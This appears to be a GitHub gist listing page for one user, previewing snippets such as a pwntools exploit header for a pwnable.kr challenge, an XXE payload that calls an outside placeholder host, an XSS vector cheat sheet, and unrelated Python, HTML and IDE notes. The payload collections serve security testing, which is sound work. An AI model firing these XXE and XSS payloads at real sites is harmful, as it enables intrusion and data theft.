@hxer
hxer / passcode-exp.py
Created November 10, 2017 08:47
pwnable.kr passcode exploit, debug with local env
# -*- coding: utf-8 -*-
from pwn import *
context.arch = 'i386'
context.word_size = 32
context.log_level = 'debug'
exe = './passcode'
@hxer
hxer / XXE_payloads
Created August 11, 2017 13:05 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@hxer
hxer / daemon.md
Last active June 18, 2017 07:32 — forked from andreif/daemon.md
A simple unix/linux daemon in Python

Source: http://www.jejik.com/articles/2007/02/a_simple_unix_linux_daemon_in_python/

Access: http://web.archive.org/web/20131025230048/http://www.jejik.com/articles/2007/02/a_simple_unix_linux_daemon_in_python/

by Sander Marechal

I've written a simple Python class for creating daemons on unix/linux systems. It was pieced together for various other examples, mostly corrections to various Python Cookbook articles and a couple of examples posted to the Python mailing lists. It has support for a pidfile to keep track of the process. I hope it's useful to someone.

@hxer
hxer / xss_vectors.txt
Created June 7, 2017 01:41 — forked from kurobeats/xss_vectors.txt
XSS Vectors Cheat Sheet
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
@hxer
hxer / pyopcode.py
Created March 18, 2017 06:25 — forked from fate0/pymarshal.py
using all python opcode
# from __future__ import division
# def_op('STOP_CODE', 0)
# ignore
# def_op('POP_TOP', 1)
a()
# def_op('ROT_TWO', 2)
(a, b) = (b, a)
@hxer
hxer / recover_source_code.md
Created March 18, 2017 00:58 — forked from simonw/recover_source_code.md
How to recover lost Python source code if it's still resident in-memory

I screwed up using git ("git checkout --" on the wrong file) and managed to delete the code I had just written... but it was still running in a process in a docker container. Here's how I got it back, using https://pypi.python.org/pypi/pyrasite/ and https://pypi.python.org/pypi/uncompyle6

Attach a shell to the docker container

Install GDB (needed by pyrasite)

apt-get update && apt-get install gdb
@hxer
hxer / form_select.html
Last active November 22, 2016 08:18
form select search
<div class="container">
<div class="row">
<div class="col-md-6 col-center-block">
<form class="form-inline" >
<div class="form-group ">
<select name="type" class="form-control">
<option value=""></option>
<option value=""></option>
<option value=""></option>
<option value=""></option>
@hxer
hxer / PHPSTORM.md
Created November 9, 2016 05:39
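PHPSTORM keyboard shortcuts

Shortcuts:

ctrl+tab:         switcher; switch between open files or between tool windows
alt+alt:          press alt twice in quick succession and hold it to show the tool windows (project, database ...)
ctrl+k:           quickly open the commit changes dialog
alt+F3:           show the search pane and search the current file; combined with ctrl+alt+r, it can perform replace operations
ctrl+shift+f:     find in path; search within a specified folder or the whole project; ctrl+shift+r performs replace operations
ctrl+shift+alt+t: quick rename; there are several options inside, take your time to understand them
shift+F6:         rename; automatically renames the variable everywhere it is used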
@hxer
hxer / sort_dict.py
Created October 8, 2016 08:13
dict sort
count = {'a': 1, 'c':4, 'g': 2}
sort_list = sorted(count.items(), key=lambda d: d[1], reverse=True)
from operator import itemgetter
sort_list = sorted(count.items(), key=itemgetter(1), reverse=True)
# -*- coding: utf-8 -*-
"""
"""
import functools
from flask import Flask, jsonify
from gevent.pywsgi import WSGIServer